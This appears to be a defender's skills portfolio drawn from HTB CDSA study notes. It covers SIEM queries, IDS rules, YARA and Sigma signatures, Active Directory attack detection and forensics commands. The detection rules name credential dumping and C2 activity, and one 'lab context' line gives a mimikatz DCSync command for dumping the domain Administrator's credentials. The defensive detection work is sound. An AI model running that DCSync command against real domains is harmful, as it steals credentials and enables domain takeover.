🛡️ Technical Skills — HTB Certified Defensive Security Analyst (CDSA)

The following technical skills were developed and documented during preparation for the HTB CDSA certification. Each section reflects hands-on, lab-validated knowledge extracted from my personal study notes. Skills are organised by industry domain and backed by the specific tool syntaxes, queries, and rule structures I know how to use.

1. SIEM & Log Analysis

Elastic Stack (ELK) / KQL

Proficient with the full Elastic Stack pipeline: Beats → Logstash → Elasticsearch → Kibana. Able to identify available data sources, explore fields, and build detection dashboards from scratch.

KQL Query Syntax:

Free-text search across all fields:
```
"svc-sql1"
```
Filter by event code:
```
event.code:4625
```

Logical operators and compound filters:

event.code:4625 AND winlog.event_data.SubStatus:0xC0000072

Date-range filtering:

event.code:4625 AND winlog.event_data.SubStatus:0xC0000072 AND @timestamp >= "2023-03-03T00:00:00.000Z" AND @timestamp <= "2023-03-06T23:59:59.999Z"

Wildcard search:
```
event.code:4625 AND user.name:admin*
```

Exclude computer accounts from login dashboards:

NOT user.name: *$ AND winlog.channel.keyword: Security

Dashboard Use Cases Built:

Failed logins (all users / disabled accounts)
Successful RDP logons by service accounts
Users added/removed from local Administrator groups — using event codes 4732 / 4733

Splunk / SPL

Deep proficiency with SPL for threat detection, investigation, and alert creation.

Data Discovery:

| eventcount summarize=false index=* | table index
| metadata type=sourcetypes index=* | table sourcetype
| metadata type=sources index=* | table source
index=* sourcetype=* | bucket _time span=1d | stats count by _time, index, sourcetype | sort - _time
index=* sourcetype=* | rare limit=10 index, sourcetype

Core SPL Constructs:

-- Deduplication, sorting, field aliasing
index="main" sourcetype="WinEventLog:Sysmon" EventCode=1 | dedup Image | sort - _time | rename Image as Process

-- Statistical aggregation
index="main" sourcetype="WinEventLog:Sysmon" EventCode=3 | stats count by _time, Image

-- Eval for field creation
index="main" sourcetype="WinEventLog:Sysmon" EventCode=1 | eval Process_Path=lower(Image)

-- Rex for regex field extraction
index="main" EventCode=4662 | rex max_match=0 "[^%](?<guid>{.*})" | table guid

-- Transaction for session analysis
index="main" sourcetype="WinEventLog:Security" (EventCode=4624 OR EventCode=4634)
| transaction host startswith=eval(EventCode=4624) endswith=eval(EventCode=4634)
| eval SessionDuration_min = round(duration/60, 2)
| table host, SessionDuration_min

-- Subsearch to exclude top 100 most common processes
index="main" sourcetype="WinEventLog:Sysmon" EventCode=1 NOT [
  search index="main" sourcetype="WinEventLog:Sysmon" EventCode=1
  | top limit=100 Image | fields Image
] | table _time, Image, CommandLine, User, ComputerName

-- Time range (last 7 days)
index="main" earliest=-7d EventCode!=1

Intrusion Detection SPL Searches:

Parent-child process anomaly hunting:

index="main" sourcetype="WinEventLog:Sysmon" EventCode=1(Image="*cmd.exe" OR Image="*powershell.exe") ParentImage="C:\\Windows\\System32\\notepad.exe"

LSASS access / credential dumping detection:

index="main" EventCode=10 lsass | stats count by SourceImageindex="main" sourcetype="WinEventLog:Sysmon" EventCode=10 TargetImage="*lsass.exe" SourceUser!="*System"| stats count by SourceImage, TargetImage, GrantedAccess, SourceUser

DCSync detection:

index="main" EventCode=4662 Access_Mask=0x100 Account_Name!=*$

Injected shellcode via unknown memory regions:

index="main" CallTrace="*UNKNOWN*" SourceImage!="*Microsoft.NET*"CallTrace!=*ni.dll* CallTrace!=*clr.dll* CallTrace!=*wow64*SourceImage!="C:\\Windows\\Explorer.EXE"| where SourceImage!=TargetImage | stats count by SourceImage

C# / CLR injection detection (Sysmon Event ID 7):

index="main" EventCode=7 ImageLoaded="*clr.dll" | stats count by Image, SignatureStatus

C2 callback identification (Sysmon Event ID 3):

index="main" EventCode=3 Image="C:\\Windows\\System32\\rundll32.exe"| stats count by DestinationIp, DestinationPort

Windows Event Log Analysis

Comprehensive knowledge of the Windows Security Event Log and their forensic significance:

Event ID	Description
`4624`	Successful logon
`4625`	Failed logon
`4648`	Explicit credential logon (lateral movement indicator)
`4662`	AD object accessed (DCSync trigger)
`4672`	Special privileges assigned to new logon
`4698/4700/4701/4702`	Scheduled task created/enabled/disabled/updated
`4719`	Audit policy changed
`4732/4733`	Member added/removed from local group
`4738`	User account changed
`4768`	Kerberos TGT requested
`4769`	Kerberos service ticket (TGS) requested
`4771`	Kerberos pre-authentication failed
`4776`	DC attempted to validate credentials
`5140/5145`	Network share accessed
`7045`	New service installed
`1102`	Audit log cleared

XPath / XML Queries for Event Viewer:

-- Filter by Event ID
*[System[(EventID=4625)]]

-- Multiple Event IDs
*[System[(EventID=4624 or EventID=4625 or EventID=4634)]]

-- Filter by username
*[EventData[Data[@Name='TargetUserName']='Administrator']]

-- DCSync property filter
*[EventData[Data[@Name='Properties']='1131f6aa-9c07-11d1-f79f-00c04fc2dcd2']]

-- Time (last 1 hour)
*[System[TimeCreated[timediff(@SystemTime) <= 3600000]]]

-- Exclude a process from results
*[System[(EventID=4688)]] and *[EventData[Data[@Name='NewProcessName']!='C:\Windows\System32\svchost.exe']]

PowerShell — `Get-WinEvent` Mass Log Analysis

# List all logs with record counts
Get-WinEvent -ListLog * | Select-Object LogName, RecordCount, IsClassicLog, IsEnabled, LogMode, LogType | Format-Table -AutoSize

# Load first 50 System events
Get-WinEvent -LogName 'System' -MaxEvents 50 | Select-Object TimeCreated, ID, ProviderName, LevelDisplayName, Message | Format-Table -AutoSize

# Load events from a .evtx file
Get-WinEvent -Path 'C:\Tools\chainsaw\EVTX-ATTACK-SAMPLES\...\exec_sysmon_1.evtx' -MaxEvents 5 | Select-Object TimeCreated, ID, ProviderName, LevelDisplayName, Message | Format-Table -AutoSize

# FilterHashtable — Sysmon Event ID 1 and 3
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1,3} | Select-Object TimeCreated, ID, ProviderName, LevelDisplayName, Message | Format-Table -AutoSize

# FilterHashtable + date range
$startDate = (Get-Date -Year 2023 -Month 5 -Day 28).Date
$endDate   = (Get-Date -Year 2023 -Month 6 -Day 3).Date
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1,3; StartTime=$startDate; EndTime=$endDate} | Select-Object TimeCreated, ID, ProviderName, LevelDisplayName, Message | Format-Table -AutoSize

# FilterHashtable + XML for network connection field extraction
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=3} | ForEach-Object {
  $xml = [xml]$_.ToXml()
  $eventData = $xml.Event.EventData.Data
  New-Object PSObject -Property @{
    SourceIP      = $eventData | Where-Object {$_.Name -eq "SourceIp"} | Select-Object -ExpandProperty '#text'
    DestinationIP = $eventData | Where-Object {$_.Name -eq "DestinationIp"} | Select-Object -ExpandProperty '#text'
    ProcessGuid   = $eventData | Where-Object {$_.Name -eq "ProcessGuid"} | Select-Object -ExpandProperty '#text'
  }
} | Where-Object {$_.DestinationIP -eq "52.113.194.132"}

# FilterXPath — detect Sysinternals EULA registry acceptance
Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' -FilterXPath "*[EventData[Data[@Name='Image']='C:\Windows\System32\reg.exe']]"

# FilterXPath — network connection to suspicious IP
Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' -FilterXPath "*[System[EventID=3] and EventData[Data[@Name='DestinationIp']='52.113.194.132']]"

# Property-based: detect encoded PowerShell via ParentCommandLine
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1} | Where-Object {$_.Properties[21].Value -like "*-enc*"} | Format-List

# XML query for CLR/MSCOREE DLL loads (detect .NET injection)
$Query = @"
<QueryList>
  <Query Id="0">
    <Select Path="Microsoft-Windows-Sysmon/Operational">
      *[System[(EventID=7)]] and *[EventData[Data='mscoree.dll']] or *[EventData[Data='clr.dll']]
    </Select>
  </Query>
</QueryList>
"@
Get-WinEvent -FilterXml $Query | ForEach-Object {Write-Host $_.Message `n}

2. Network Traffic Analysis

TCPDump

# Basic capture on interface
sudo tcpdump -i eth0

# Capture with hex + ASCII output
sudo tcpdump -i eth0 -X

# No DNS resolution, verbose, hex+ASCII, first 100 packets
sudo tcpdump -nvXc 100 -i eth0

# Read from a file, pipe-friendly
sudo tcpdump -Ar /tmp/capture.pcap -l | grep 'mailto:*'

# Write capture to file
sudo tcpdump -i eth0 -w capture.pcap

# Host filter (bidirectional)
sudo tcpdump -i eth0 host 172.16.146.2

# Source/destination filter
sudo tcpdump -i eth0 src host 172.16.146.2
sudo tcpdump -i eth0 dest net 172.16.146.0/24

# Port and protocol filters
sudo tcpdump -i eth0 tcp src port 80
sudo tcpdump -i eth0 tcp port 443
sudo tcpdump -i eth0 portrange 0-1024
sudo tcpdump -i eth0 udp
sudo tcpdump -i eth0 proto 17

# Packet size filters
sudo tcpdump -i eth0 less 64
sudo tcpdump -i eth0 greater 500

# Compound filters
sudo tcpdump -i eth0 host 192.168.0.1 and port 23
sudo tcpdump -r sus.pcap icmp or host 172.16.146.1
sudo tcpdump -r sus.pcap not icmp

# Filter out ICMP
sudo tcpdump -i eth0 not icmp

Wireshark / TShark / Termshark

# TShark — capture with BPF filter
sudo tshark -i eth0 -f "host 172.16.146.2"

# TShark — list interfaces
tshark -D

Wireshark Display Filters:

Filter	Purpose
`ip.addr == x.x.x.x`	Filter by host (bidirectional)
`ip.src == x.x.x.x` / `ip.dst == x.x.x.x`	Directional host filter
`tcp.port == 443`	TCP port filter
`tcp.port != 8080`	Exclude port
`ftp`	FTP control traffic
`ftp.request.command`	FTP commands only
`ftp-data`	FTP data transfer
`tcp.stream eq 5`	Follow specific TCP stream
`tcp.len == 312`	Match exact payload size (beacon detection)

Key Workflow — Decrypting RDP:

Filter on tcp.port == 3389
Edit → Preferences → Protocols → TLS → RSA Keys
Add server IP (10.129.x.x), port 3389, protocol tpkt, and the server.key file

Zeek

# Analyse a PCAP offline
/usr/local/zeek/bin/zeek -C -r /home/htb-student/pcaps/psempire.pcap

# Extract DNS fields from dns.log (DNS exfiltration detection)
cat dns.log | /usr/local/zeek/bin/zeek-cut query | cut -d . -f1-7

# Top 10 data senders — TLS exfiltration detection
cat conn.log | /usr/local/zeek/bin/zeek-cut id.orig_h id.resp_h orig_bytes \
  | sort | grep -v -e '^$' | grep -v '-' \
  | datamash -g 1,2 sum 3 | sort -k 3 -rn | head -10

# Transfer a PCAP from target for local analysis
scp htb-student@[TARGET_IP]:/home/htb-student/pcaps/psempire.pcap .

Key Zeek Log Files:

Log	Contents
`conn.log`	IP/TCP/UDP/ICMP connection records, data volumes, timing
`dns.log`	DNS queries and responses
`http.log`	HTTP requests, URIs, user agents, status codes
`smb_files.log`	SMB file transfer activity
`dce_rpc.log`	RPC calls — used to detect PsExec, PrintNightmare
`smb_mapping.log`	SMB share mappings

Beaconing Detection Indicators (via conn.log):

Repetitive connections to same destination IP
Uniform orig_bytes / resp_bytes values
Consistent connection timing intervals (~5 second periodicity)

3. Intrusion Detection & Prevention (IDS/IPS)

Suricata

# Validate configuration
sudo suricata -T -c /etc/suricata/suricata.yaml

# Run against a PCAP file
suricata -r /home/htb-student/pcaps/suspicious.pcap

# Run with a specific rules file, suppress checksum errors
sudo suricata -r /home/htb-student/pcaps/psempire.pcap -l . -k none

# Live reload rules without restart
sudo kill -usr2 $(pidof suricata)

# Update rulesets
sudo suricata-update
sudo systemctl restart suricata

# Inspect extracted files from filestore
find /var/log/suricata/filestore -type f
xxd ./21/21742fc621f83041... | head

# Parse EVE JSON for specific event types
jq 'select(.event_type == "http")' /var/log/suricata/old_eve.json

Suricata Rule Anatomy:

action protocol src_ip src_port -> dst_ip dst_port (msg:"Description"; <options>; sid:X; rev:1;)

Rule — PowerShell Empire C2 Detection:

alert http $HOME_NET any -> $EXTERNAL_NET any
(msg:"ET MALWARE Possible PowerShell Empire Activity Outbound";
flow:established,to_server;
content:"GET"; http_method;
content:"/"; http_uri; depth:1;
pcre:"/^(?:login\/process|admin\/get|news)\.php$/RU";
content:"session="; http_cookie;
pcre:"/^(?:[A-Z0-9+/]{4})*(?:[A-Z0-9+/]{2}==|[A-Z0-9+/]{3}=|[A-Z0-9+/]{4})$/CRi";
content:"Mozilla|2f|5.0|20 28|Windows|20|NT|20|6.1"; http_user_agent;
content:!"Referer"; content:!"Cache"; content:!"Accept";
sid:2027512; rev:1;)

Rule — Covenant C2 Beaconing (Signature + Analytic):

-- Signature-based (hardcoded URL patterns)
alert tcp any any -> any any (msg:"detected by /en-us/test.html? url"; flow:to_server,established; content:"/en-us/test.html?"; metadata:service http; sid:3000012;)

-- Analytic-based (exact beacon payload size)
alert tcp $HOME_NET any -> any any (msg:"detected by size and counter"; dsize:312; detection_filter: track by_src, count 3, seconds 10; priority:1; sid:3000001;)

Rule — Sliver C2 Detection (URI Pattern + Cookie):

alert tcp any any -> any any
(msg:"Sliver C2 Implant Detected";
content:"POST";
pcre:"/\/(php|api|upload|actions|rest|v1|oauth2callback|authenticate|oauth2|oauth|auth|database|db|namespaces)(.*?)((login|signin|api|samples|rpc|index|admin|register|sign-up)\.php)\?[a-z_]{1,2}=[a-z0-9]{1,10}/i";
sid:1000007; rev:1;)

alert tcp any any -> any any
(msg:"Sliver C2 Implant Detected - Cookie";
content:"Set-Cookie";
pcre:"/(PHPSESSID|SID|SSID|APISID|csrf-state|AWSALBCORS)\=[a-z0-9]{32}\;/";
sid:1000003; rev:1;)

File Extraction in Suricata (/etc/suricata/suricata.yaml):

file-store:
  version: 2
  enabled: yes
  force-filestore: yes

alert http any any -> any any (msg:"FILE store all"; filestore; sid:2; rev:1;)

Snort 3

# Validate configuration
sudo snort -c /root/snorty/etc/snort/snort.lua --daq-dir /usr/local/lib/daq

# Read from PCAP
sudo snort -c /root/snorty/etc/snort/snort.lua --daq-dir /usr/local/lib/daq -r /home/htb-student/pcaps/icmp.pcap

# Listen on interface
sudo snort -c /root/snorty/etc/snort/snort.lua --daq-dir /usr/local/lib/daq -i ens160

# Run with local rules file, CMG alert output
sudo snort -c /root/snorty/etc/snort/snort.lua --daq-dir /usr/local/lib/daq -r /home/htb-student/pcaps/wannamine.pcap -R /home/htb-student/local.rules -A cmg

# List available modules
snort --help-modules

# Query module defaults
snort --help-config arp_spoof

# List available logger types
snort --list-plugins | grep logger

4. Detection Engineering

YARA Rules

Running YARA:

# Scan a directory recursively
yara upx_packed.yar /home/htb-student/Samples/YARASigma/ -r 2>/dev/null

# Scan on Windows, suppress errors
yara64.exe -s C:\Rules\yara\dharma_ransomware.yar C:\Samples\YARASigma\ -r 2>null

# Scan all running processes (PowerShell)
Get-Process | ForEach-Object {
  "Scanning PID " + $_.id;
  & "yara64.exe" "C:\Rules\yara\meterpreter_shellcode.yar" $_.id
}

# Scan a specific PID
yara64.exe C:\Rules\yara\meterpreter_shellcode.yar 4568 --print-strings

# ETW-integrated scanning with SilkETW
.\SilkETW.exe -t user -pn Microsoft-Windows-PowerShell -ot file -p ./etw_ps_logs.json -l verbose -y C:\Rules\yara -yo Matches
.\SilkETW.exe -t user -pn Microsoft-Windows-DNS-Client -ot file -p ./etw_dns_logs.json -l verbose -y C:\Rules\yara -yo Matches

YARA Rule Examples:

-- UPX-packed malware detection
rule UPX_packed_executable {
    meta:
        description = "Detects UPX-packed executables"
    strings:
        $string_1 = "UPX0"
        $string_2 = "UPX1"
        $string_3 = "UPX2"
    condition:
        all of them
}

-- APT17 / ZoxPNG RAT (with PE module + imphash)
import "pe"
rule APT17_Malware_Oct17_Gen {
    meta:
        description = "Detects APT17 malware"
        author = "Florian Roth"
        date = "2017-10-03"
    strings:
        $x1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)" fullword ascii
        $s3 = "Cookie: SESSIONID=%s" fullword ascii
        $s5 = "Content-Type: image/x-png" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 200KB and (
            pe.imphash() == "414bbd566b700ea021cfae3ad8f4d9b9" or
            1 of ($x*) or 6 of them
        )
}

-- Meterpreter reverse TCP shellcode (process memory scan)
rule meterpreter_reverse_tcp_shellcode {
    meta:
        description = "Rule for metasploit meterpreter reverse tcp raw shellcode"
    strings:
        $s1 = { fce8 8?00 0000 60 }
        $s2 = { 648b ??30 }
        $s3 = { 4c77 2607 }
        $s4 = "ws2_"
        $s5 = { 2980 6b00 }
        $s6 = { ea0f dfe0 }
        $s7 = { 99a5 7461 }
    condition:
        5 of them
}

-- Encrypted resource / Shamoon-style wiper detection
import "pe"
import "math"
rule susp_file_enumerator_with_encrypted_resource_101 {
    strings:
        $a1 = "FindFirstFile" ascii wide nocase
        $a2 = "FindNextFile" ascii wide nocase
        $a3 = "FindResource" ascii wide nocase
        $a4 = "LoadResource" ascii wide nocase
    condition:
        uint16(0) == 0x5A4D and all of them and filesize < 700000
        and pe.number_of_sections > 4 and pe.number_of_signatures == 0
        and for any i in (0..pe.number_of_resources - 1): (
            (math.entropy(pe.resources[i].offset, pe.resources[i].length) > 7.8)
            and pe.resources[i].id == 101
            and pe.resources[i].length > 20000
        )
}

YARA Rule Authoring with yarGen:

python3 yarGen.py -m /path/to/malware/dir -o output_rule.yar

Sigma Rules

Sigma rules are written in YAML and converted to SIEM-specific queries using pySigma.

Sigma Rule Example — LethalHTA Detection:

title: Potential LethalHTA Technique Execution
id: ed5d72a6-f8f4-479d-ba79-02f6a80d7471
status: test
description: Detects mshta.exe spawned by svchost.exe
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\svchost.exe'
        Image|endswith: '\mshta.exe'
    condition: selection
falsepositives:
    - Unknown
level: high

Key Sigma Concepts Mastered:

Value modifiers: contains, startswith, endswith, re:, all, |lowercase|contains
Detection logic: Search identifiers with maps vs. string lists; condition operators (and, or, not, all of them, 1 of selection*)
Log source attributes: category (process_creation, network_connection), product (windows, linux), service (Security, sysmon)

ETW (Event Tracing for Windows)

-- List all running ETW sessions
logman query -ets

-- Query a specific session
logman query "EventLog-System" -ets

-- Find a specific provider
logman query providers | findstr "Winlogon"
logman query providers | findstr "Process"

-- Query full provider details
logman.exe query providers Microsoft-Windows-Winlogon

SilkETW — ETW Data Collection:

-- Collect from Kernel-Process provider (detect parent PID spoofing)
SilkETW.exe -t user -pn Microsoft-Windows-Kernel-Process -ot file -p C:\windows\temp\etw.json

-- Collect .NET runtime events (detect execute-assembly / CLR injection)
SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038 -ot file -p C:\windows\temp\etw.json

Key ETW Providers for Detection:

Provider	Detects
`Microsoft-Windows-Kernel-Process`	Process injection, hollowing, parent PID spoofing
`Microsoft-Windows-Kernel-Network`	C2 connections, exfiltration
`Microsoft-Windows-DotNETRuntime`	Malicious .NET assembly loading (execute-assembly)
`Microsoft-Windows-PowerShell`	Obfuscated PS scripts, encoded payloads
`Microsoft-Windows-DNS-Client`	DNS tunneling, C2 domain beaconing
`Microsoft-Windows-Threat-Intelligence`	Requires PPL — deep kernel visibility

Sysmon

Key Sysmon Event IDs for detection engineering:

Event ID	Description	Detection Use Case
`1`	Process creation	Parent-child anomalies, LOLBin abuse
`2`	File creation time change	Timestomping
`3`	Network connection	C2 beaconing, lateral movement
`7`	Image loaded (DLL)	DLL hijacking, CLR injection detection
`8`	CreateRemoteThread	Process injection
`10`	ProcessAccess	Credential dumping (LSASS access)
`11`	FileCreate	Payload drops, Zone.Identifier (downloads)
`13`	RegistryEvent (value set)	PsExec service registration, persistence
`17/18`	Pipe created/connected	PsExec named pipes, lateral movement
`22`	DNS query	C2 domain resolution, DNS beaconing
`25`	Process tampering	Process herpadering / hollowing

Sysmon Config:

sysmon.exe -c sysmonconfig-export.xml

5. Active Directory Attack Detection

Detection — Reconnaissance

-- Native Windows binary recon detection (Splunk)
index="main" sourcetype="WinEventLog:Sysmon" EventCode=1
Image=*\\ipconfig.exe OR Image=*\\net.exe OR Image=*\\whoami.exe OR Image=*\\netstat.exe
OR Image=*\\nbtstat.exe OR Image=*\\hostname.exe OR Image=*\\tasklist.exe
| stats values(process) as process, min(_time) as _time by parent_process, parent_process_id, dest, user
| where mvcount(process) > 3

-- BloodHound/SharpHound LDAP recon detection (SilkETW + Splunk)
index=main source="WinEventLog:SilkService-Log"
| spath input=Message | rename XmlEventData.* as *
| table _time, ComputerName, ProcessName, ProcessId, DistinguishedName, SearchFilter
| search SearchFilter="*(samAccountType=805306368)*"
| stats count by ComputerName, ProcessName, ProcessId
| where count > 10

Detection — Kerberoasting

-- Detect SPN enumeration via LDAP
index=main source="WinEventLog:SilkService-Log"
| spath input=Message | rename XmlEventData.* as *
| search SearchFilter="*(&(samAccountType=805306368)(servicePrincipalName=*)*"
| table _time, ComputerName, ProcessName, DistinguishedName, SearchFilter

-- Detect TGS requests without subsequent logon (Kerberoasting indicator)
index=main EventCode=4648 OR (EventCode=4769 AND service_name=iis_svc)
| dedup RecordNumber
| rex field=user "(?<username>[^@]+)"
| search username!=*$
| transaction username keepevicted=true maxspan=5s endswith=(EventCode=4648) startswith=(EventCode=4769)
| where closed_txn=0 AND EventCode=4769
| table _time, EventCode, service_name, username

XPath filter for RC4 downgrade detection (Event ID 4769):

*[EventData[Data[@Name='TicketEncryptionType']='0x17']]

Detection — AS-REProasting

-- Detect accounts with pre-auth disabled queried via LDAP
index=main source="WinEventLog:SilkService-Log"
| spath input=Message | rename XmlEventData.* as *
| search SearchFilter="*(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304)*"

-- Detect TGT requests with no pre-authentication (Event ID 4768)
index=main source="WinEventLog:Security" EventCode=4768 Pre_Authentication_Type=0
| rex field=src_ip "(\:\:ffff\:)?(?<src_ip>[0-9\.]+)"
| table _time, src_ip, user, Pre_Authentication_Type, Ticket_Encryption_Type

Detection — PsExec

-- Sysmon Event ID 13: PsExec service registry write
index="main" sourcetype="WinEventLog:Sysmon" EventCode=13
Image="C:\\Windows\\system32\\services.exe"
TargetObject="HKLM\\System\\CurrentControlSet\\Services\\*\\ImagePath"
| rex field=Details "(?<reg_file_name>[^\\\]+)$"
| eval reg_file_name = lower(reg_file_name)
| stats values(Image) AS Image, values(Details) AS RegistryDetails, count by file_name, ComputerName

-- Sysmon Event ID 11: PsExec binary drop to ADMIN$
index="main" sourcetype="WinEventLog:Sysmon" EventCode=11 Image=System
| stats count by TargetFilename

-- Sysmon Event ID 18: Named pipe connection (PSEXESVC)
index="main" sourcetype="WinEventLog:Sysmon" EventCode=18 Image=System
| stats count by PipeName

Detection — DCSync

-- Event ID 4662 with DCSync replication property GUIDs
index="main" EventCode=4662 Access_Mask=0x100 Account_Name!=*$

-- XPath filter for DCSync-specific properties
*[System[(EventID=4662)]]
and *[EventData[Data[@Name='Properties']='1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'
  or Data[@Name='Properties']='1131f6ad-9c07-11d1-f79f-00c04fc2dcd2']]

Attack Execution (for lab context):

mimikatz.exe
lsadump::dcsync /domain:eagle.local /user:Administrator

Detection — Additional TTP-Based SPL Searches

-- Archive file creation (data exfiltration staging)
index="main" EventCode=11
(TargetFilename="*.zip" OR TargetFilename="*.rar" OR TargetFilename="*.7z")
| stats count by ComputerName, User, TargetFilename | sort - count

-- PowerShell downloading payloads
index="main" sourcetype="WinEventLog:Sysmon" EventCode=11 Image="*powershell.exe*"
| stats count by Image, TargetFilename | sort + count

-- Browser-downloaded files with Zone.Identifier (internet mark-of-the-web)
index="main" sourcetype="WinEventLog:Sysmon" EventCode=11 Image="*msedge.exe" TargetFilename="*Zone.Identifier"
| stats count by TargetFilename | sort + count

-- Execution from Downloads folder (suspicious)
index="main" EventCode=1 | regex Image="C:\\\\Users\\\\.*\\\\Downloads\\\\.*"
| stats count by Image

-- EXE/DLL created outside Windows directory (potential malware drop)
index="main" EventCode=11 (TargetFilename="*.exe" OR TargetFilename="*.dll") TargetFilename!="*\\windows\\*"
| stats count by User, TargetFilename | sort + count

-- Non-standard outbound port usage (C2 indicator)
index="main" EventCode=3
NOT (DestinationPort=80 OR DestinationPort=443 OR DestinationPort=22 OR DestinationPort=21)
| stats count by SourceIp, DestinationIp, DestinationPort | sort - count

-- Misspelled legitimate binary detection
index="main" sourcetype="WinEventLog:Sysmon" EventCode=1
(Image="*psexe*.exe" NOT (Image="*PSEXESVC.exe" OR Image="*PsExec64.exe"))
| table Image, CommandLine, ParentImage, ParentCommandLine

-- GitHub-hosted payload download detection (DNS, Sysmon ID 22)
index="main" sourcetype="WinEventLog:Sysmon" EventCode=22 QueryName="*github*"
| stats count by Image, QueryName

6. Digital Forensics & Incident Response (DFIR)

Volatility Framework (Memory Forensics)

# Identify memory profile
vol.py -f /home/htb-student/MemoryDumps/Win7-2515534d.vmem imageinfo

# List running processes
vol.py -f /path/to/dump.vmem --profile=Win7SP1x64 pslist

# Rootkit-resistant process scan (pool tag scanning)
vol.py -f /path/to/dump.vmem --profile=Win7SP1x64 psscan

# Network connections and open ports
vol.py -f /path/to/dump.vmem --profile=Win7SP1x64 netscan

# Detect injected code (PAGE_EXECUTE_READWRITE regions)
vol.py -f /path/to/dump.vmem --profile=Win7SP1x64 malfind --pid=608

# List open handles (by type)
vol.py -f /path/to/dump.vmem --profile=Win7SP1x64 handles -p 1512 --object-type=Key
vol.py -f /path/to/dump.vmem --profile=Win7SP1x64 handles -p 1512 --object-type=File
vol.py -f /path/to/dump.vmem --profile=Win7SP1x64 handles -p 1512 --object-type=Process

# List Windows services
vol.py -f /path/to/dump.vmem --profile=Win7SP1x64 svcscan | more

# List loaded DLLs for a process
vol.py -f /path/to/dump.vmem --profile=Win7SP1x64 dlllist -p 1512

# List registry hives
vol.py -f /path/to/dump.vmem --profile=Win7SP1x64 hivelist

# Process command-line arguments
vol.py -f /path/to/dump.vmem --profile=Win7SP1x64 cmdline

# Find DLL loaded by a specific process
vol.py -f /path/to/dump.vmem --profile=Win7SP1x64 dlllist | grep zlib1

Rootkit Detection — DKOM (Direct Kernel Object Manipulation):

pslist relies on the EPROCESS doubly-linked list — can be unlinked by rootkits
psscan bypasses this by scanning raw memory for EPROCESS pool tags — rootkit-resistant

Memory String Analysis

# Extract IPv4 addresses from memory dump
strings /path/to/dump.vmem | grep -E "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"

# Extract email addresses
strings /path/to/dump.vmem | grep -oE "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b"

# Find cmd/PowerShell artifacts
strings /path/to/dump.vmem | grep -E "(cmd|powershell|bash)[^\s]+"

# Windows — search memory files for URLs
.\strings64.exe "C:\Users\*\Desktop\*" | Select-String -Pattern "https?:\/\/(?:www\.)?[^\s/$.?#].[^\s]*" -AllMatches > web.txt

Static Malware Analysis

Linux:

# Identify file type via magic bytes
file /path/to/malware.exe
hexdump -C /path/to/malware.exe | more

# File hashing
md5sum /path/to/malware.exe
sha256sum /path/to/malware.exe

# String extraction
strings -n 15 /path/to/malware.exe
floss /path/to/malware.exe

# UPX unpacking
upx -d -o unpacked_malware.exe packed_malware.exe

# IMPHASH calculation (Python)
python3 imphash_calc.py /path/to/malware.exe

# Fuzzy hashing (SSDEEP)
ssdeep /path/to/malware.exe
ssdeep -pb /path/to/samples/

# PE section entropy (Python — detects encrypted/compressed resources)
python3 section_entropy.py /path/to/malware.exe

# .NET decompilation
monodis --output=code /path/to/dotnet_malware.exe

Windows (PowerShell):

Get-FileHash -Algorithm MD5 C:\Samples\malware.exe
Get-FileHash -Algorithm SHA256 C:\Samples\malware.exe
strings C:\Samples\malware.exe
floss C:\Samples\malware.exe
upx -d -o unpacked.exe C:\Samples\packed\credential_stealer.exe

Dynamic Malware Analysis

Tools and workflow:

Process Monitor (ProcMon) — Monitor file system, registry, and process activity in real time
Noriben — Python wrapper for ProcMon; applies malware-specific filters and generates readable reports:
```
python .\Noriben.py
```
Regshot — Before/after registry snapshots
Wireshark / FakeNet-NG / INetSim — Network traffic capture and simulation

Disk Forensics — Autopsy

Capabilities used with Autopsy:

File Structure Insight — Navigate disk image directories
Web Artifacts Analysis — Browser cache, history, cookies
Keyword Search — Full-disk keyword hunting (e.g. powershell.exe)
Deleted File Recovery — Carved files from unallocated space
Attached Devices — USB device history
Timeline Analysis — Event correlation across the file system
Email Carving — Internal threat investigation

7. Malware Analysis

Code Analysis & Reverse Engineering (IDA Pro)

Key capabilities demonstrated:

Import a PE binary and navigate between Graph View (control flow) and Text View (assembly + addresses)
Identify and rename unknown functions (sub_XXXXXX → meaningful names)
Trace Windows API calls by cross-referencing the Import Address Table (.idata section)
Decode arguments passed to WinAPI functions via register inspection (rcx, rdx, r8d, r9d)
Identify sandbox detection routines (VMware Tools registry checks via RegOpenKeyExA)
Identify network functions (WSAStartup, getaddrinfo, connect) and extract hardcoded C2 IOCs

Key WinAPI functions analysed:

RegOpenKeyExA / RegQueryValueExA — Registry-based sandbox detection
ShellExecuteA — Ping-based sleep delay mechanism
WSAStartup / getaddrinfo / connect — Network C2 initialisation
CreateRemoteThread — Process injection
SeDebugPrivilege — Credential dumping pre-condition

PE File Analysis Techniques

Technique	Tool	Purpose
Magic byte identification	`file`, `hexdump`, HxD	Confirm PE (MZ header: `4D 5A`)
MD5 / SHA256	`md5sum`, `sha256sum`, `Get-FileHash`	Fingerprinting and IoC sharing
IMPHASH	`pefile` Python module	Group malware by identical import order
SSDEEP	`ssdeep`	Find near-duplicate variants
Section entropy	Custom Python + `pefile`	Detect packed/encrypted payloads (entropy > 7.8)
String extraction	`strings`, `floss`	Uncover embedded paths, IPs, C2 domains
UPX unpacking	`upx -d`	Restore packed binary for analysis
.NET decompilation	`monodis`, `dnSpy`	Recover class/method names for YARA/Sigma

8. Threat Hunting

Methodology

Structured process applied across all hunts:

Stage Setting — Verify tooling (EDR, SIEM, IDS), subscribe to threat intel feeds
Hypothesis Formulation — Based on threat reports, OSINT, professional intuition
